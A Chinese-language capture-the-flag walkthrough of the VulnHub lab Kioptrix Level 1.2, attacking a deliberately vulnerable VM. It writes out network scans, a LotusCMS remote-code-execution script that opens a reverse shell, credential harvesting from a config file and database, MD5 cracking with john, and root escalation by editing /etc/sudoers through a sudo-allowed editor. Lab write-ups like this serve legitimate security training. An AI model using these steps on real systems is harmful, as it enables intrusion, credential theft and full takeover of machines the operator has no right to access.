环境搭建
Kioptrix: Level 1.2 (#3) ~ VulnHub
将 kali 与 靶机 的网络模式设置为 NAT 模式
靶机:192.168.198.179
kali(攻击机):192.168.198.129
主机扫描
nmap -sP 192.168.198.0/24 -T4
端口扫描
nmap -sV 192.168.198.179
开放了 2 个端口 ssh22 http80
访问 80 端口
漏洞探测
发现 web 网站的 CMS 为 Lotus
发现 3 个界面,点击 login 这个界面应该就是CMS后台的登录界面了
尝试再去互联网搜索搜索LotusCMS exploit,发现在github中存在LotusCMS的漏洞利用脚本:LotusCMS-Exploit/lotusRCE.sh at master · Hood3dRob1n/LotusCMS-Exploit (github.com)
反弹 shell
下载lotusRCE.sh 文件
利用脚本
./lotusRCE.sh http://192.168.198.179/
发现可以利用,提示我们输入可用 ip,也就是反弹 shell 的 ip
在 kali 开启监听
填入 kali ip 与监听端口,选择 1
反弹 shell 成功
提权
建立交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看权限
sudo -l
发现要输入密码,放弃
尝试查看/etc/passwd
查看文件权限,只有可读权限
查看其他文件,发现一个配置文件,发现数据库账户密码
连接数据库
mysql -uroot -p
fuckeyou
连接成功,查找数据库
发现我们需要查看的两张表
dreg 0d3eccfb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
发现两个用户和密码的 hash,密码加密应该是md5
同样发现一个用户密码 admin/n0t7t1k4
使用john破解md5,常用字典是rockyou.txt
将两个密码保存在 hash 文件中
john hash --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
dreg Mast3r
loneferret starwars
连接 ssh
ssh dreg@192.168.198.179 -oHostKeyAlgorithms=ssh-rsa,ssh-dss
没有 sudo 权限,尝试另一个用户
ssh loneferret@192.168.198.179 -oHostKeyAlgorithms=ssh-rsa,ssh-dss
SUDO 提权
sudo /usr/local/bin/ht
发现报错
添加一下终端的环境变量:
export TERM=xterm-color
再次执行发现是个编辑器,修改/etc/sudoers,按F3,输入/etc/sudoers即可编辑:
在最后一行追加loneferret ALL=(ALL)NOPASSWD:ALL
就可以修改当前用户为最高权限 F2 保存
F10 退出再次运行sudo -l查看权限,可以看到已经有ALL权限了
sudo /bin/bash
提权成功!